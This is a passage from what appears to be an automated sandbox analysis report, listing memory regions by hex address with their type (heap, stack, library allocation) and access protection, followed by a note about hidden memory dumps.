page read and write
|
||
|
661000
|
heap
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
9D125FE000
|
stack
|
page read and write
|
||
|
6CD000
|
heap
|
page read and write
|
||
|
7FFE148B0000
|
unkown
|
page readonly
|
||
|
BFF77E000
|
stack
|
page read and write
|
||
|
20AEF348000
|
heap
|
page read and write
|
||
|
1DEEFCC0000
|
heap
|
page read and write
|
||
|
65CC000
|
heap
|
page read and write
|
||
|
329F000
|
heap
|
page read and write
|
||
|
59CF000
|
stack
|
page read and write
|
||
|
69F000
|
heap
|
page read and write
|
||
|
701000
|
heap
|
page read and write
|
||
|
722000
|
heap
|
page read and write
|
||
|
3283000
|
heap
|
page read and write
|
||
|
32BD000
|
heap
|
page read and write
|
||
|
BFF676000
|
stack
|
page read and write
|
||
|
5ACA000
|
heap
|
page read and write
|
||
|
19966450000
|
heap
|
page read and write
|
||
|
28BF6700000
|
heap
|
page read and write
|
||
|
507F000
|
heap
|
page read and write
|
||
|
9FE000
|
stack
|
page read and write
|
||
|
71F000
|
heap
|
page read and write
|
||
|
A7FB000
|
heap
|
page read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
28E73E20000
|
heap
|
page read and write
|
||
|
AE6000
|
heap
|
page read and write
|
||
|
20AEF340000
|
heap
|
page read and write
|
||
|
3281000
|
heap
|
page read and write
|
||
|
329A000
|
heap
|
page read and write
|
||
|
5ACA000
|
heap
|
page read and write
|
||
|
28E73AD0000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
65E0000
|
heap
|
page read and write
|
||
|
3430000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
6591000
|
heap
|
page read and write
|
||
|
3267000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
6B7000
|
heap
|
page read and write
|
||
|
BFFB7B000
|
stack
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
AD5C000
|
stack
|
page read and write
|
||
|
9840000
|
heap
|
page read and write
|
||
|
326C000
|
heap
|
page read and write
|
||
|
199664A5000
|
heap
|
page read and write
|
||
|
65D9000
|
heap
|
page read and write
|
||
|
3267000
|
heap
|
page read and write
|
||
|
32A1000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
BFFAF8000
|
stack
|
page read and write
|
||
|
6E1000
|
heap
|
page read and write
|
||
|
71D000
|
heap
|
page read and write
|
||
|
65D2000
|
heap
|
page read and write
|
||
|
689000
|
heap
|
page read and write
|
||
|
1F0D50E0000
|
heap
|
page read and write
|
||
|
1F0D5415000
|
heap
|
page read and write
|
||
|
32A1000
|
heap
|
page read and write
|
||
|
20AEF363000
|
heap
|
page read and write
|
||
|
5A70000
|
heap
|
page read and write
|
||
|
20AEF540000
|
heap
|
page read and write
|
||
|
60D000
|
stack
|
page read and write
|
||
|
32A7000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
3420000
|
trusted library allocation
|
page read and write
|
||
|
BFF97F000
|
stack
|
page read and write
|
||
|
8CF0A7C000
|
stack
|
page read and write
|
||
|
1F0D5251000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
65E6000
|
heap
|
page read and write
|
||
|
7FFE148B9000
|
unkown
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
672000
|
heap
|
page read and write
|
||
|
6B9000
|
heap
|
page read and write
|
||
|
65CC000
|
heap
|
page read and write
|
||
|
5AB6000
|
heap
|
page read and write
|
||
|
5A91000
|
heap
|
page read and write
|
||
|
5A6F000
|
stack
|
page read and write
|
||
|
20AEF41A000
|
heap
|
page read and write
|
||
|
687000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
32C3000
|
heap
|
page read and write
|
||
|
1F0D5249000
|
heap
|
page read and write
|
||
|
6FD000
|
heap
|
page read and write
|
||
|
65D1000
|
heap
|
page read and write
|
||
|
9AE2B4C000
|
stack
|
page read and write
|
||
|
5B0000
|
trusted library allocation
|
page read and write
|
||
|
6EC000
|
heap
|
page read and write
|
||
|
6D6000
|
heap
|
page read and write
|
||
|
988D000
|
heap
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
65B6000
|
heap
|
page read and write
|
||
|
6FE000
|
heap
|
page read and write
|
||
|
38CE000
|
stack
|
page read and write
|
||
|
65CE000
|
heap
|
page read and write
|
||
|
6EB000
|
heap
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
329E000
|
heap
|
page read and write
|
||
|
32A8000
|
heap
|
page read and write
|
||
|
6EC000
|
heap
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
58CC000
|
stack
|
page read and write
|
||
|
9D1297B000
|
stack
|
page read and write
|
||
|
6C3000
|
heap
|
page read and write
|
||
|
69A000
|
heap
|
page read and write
|
||
|
1DEEE248000
|
heap
|
page read and write
|
||
|
9844000
|
heap
|
page read and write
|
||
|
1F0D50D0000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
7FFE148B9000
|
unkown
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
A7F0000
|
heap
|
page read and write
|
||
|
AC5B000
|
stack
|
page read and write
|
||
|
33CF000
|
stack
|
page read and write
|
||
|
3286000
|
heap
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
65CB000
|
heap
|
page read and write
|
||
|
6C5000
|
heap
|
page read and write
|
||
|
5A0D000
|
stack
|
page read and write
|
||
|
65EA000
|
heap
|
page read and write
|
||
|
596E000
|
stack
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
703000
|
heap
|
page read and write
|
||
|
65CF000
|
heap
|
page read and write
|
||
|
709000
|
heap
|
page read and write
|
||
|
BFF7FF000
|
stack
|
page read and write
|
||
|
1F0D5410000
|
heap
|
page read and write
|
||
|
5AD5000
|
heap
|
page read and write
|
||
|
69C000
|
heap
|
page read and write
|
||
|
65D1000
|
heap
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
704000
|
heap
|
page read and write
|
||
|
5ACA000
|
heap
|
page read and write
|
||
|
6D6000
|
heap
|
page read and write
|
||
|
65E6000
|
heap
|
page read and write
|
||
|
65B8000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
65CF000
|
heap
|
page read and write
|
||
|
9D124FE000
|
stack
|
page read and write
|
||
|
9D1247E000
|
stack
|
page read and write
|
||
|
A9EF000
|
stack
|
page read and write
|
||
|
3295000
|
heap
|
page read and write
|
||
|
3256000
|
heap
|
page read and write
|
||
|
4614000
|
heap
|
page read and write
|
||
|
19966270000
|
heap
|
page read and write
|
||
|
1F0D5100000
|
heap
|
page read and write
|
||
|
C6F2BCC000
|
stack
|
page read and write
|
||
|
4616000
|
heap
|
page read and write
|
||
|
6C3000
|
heap
|
page read and write
|
||
|
6E0000
|
heap
|
page read and write
|
||
|
6605000
|
heap
|
page read and write
|
||
|
6F7000
|
heap
|
page read and write
|
||
|
65EB000
|
heap
|
page read and write
|
||
|
65F4000
|
heap
|
page read and write
|
||
|
9851000
|
heap
|
page read and write
|
||
|
5074000
|
heap
|
page read and write
|
||
|
6E1000
|
heap
|
page read and write
|
||
|
9845000
|
heap
|
page read and write
|
||
|
577B000
|
stack
|
page read and write
|
||
|
32BC000
|
heap
|
page read and write
|
||
|
6D8000
|
heap
|
page read and write
|
||
|
327D000
|
heap
|
page read and write
|
||
|
19966350000
|
heap
|
page read and write
|
||
|
5AD0000
|
heap
|
page read and write
|
||
|
A81E000
|
heap
|
page read and write
|
||
|
A7FA000
|
heap
|
page read and write
|
||
|
53B0000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
There are 488 hidden memdumps, click here to show them.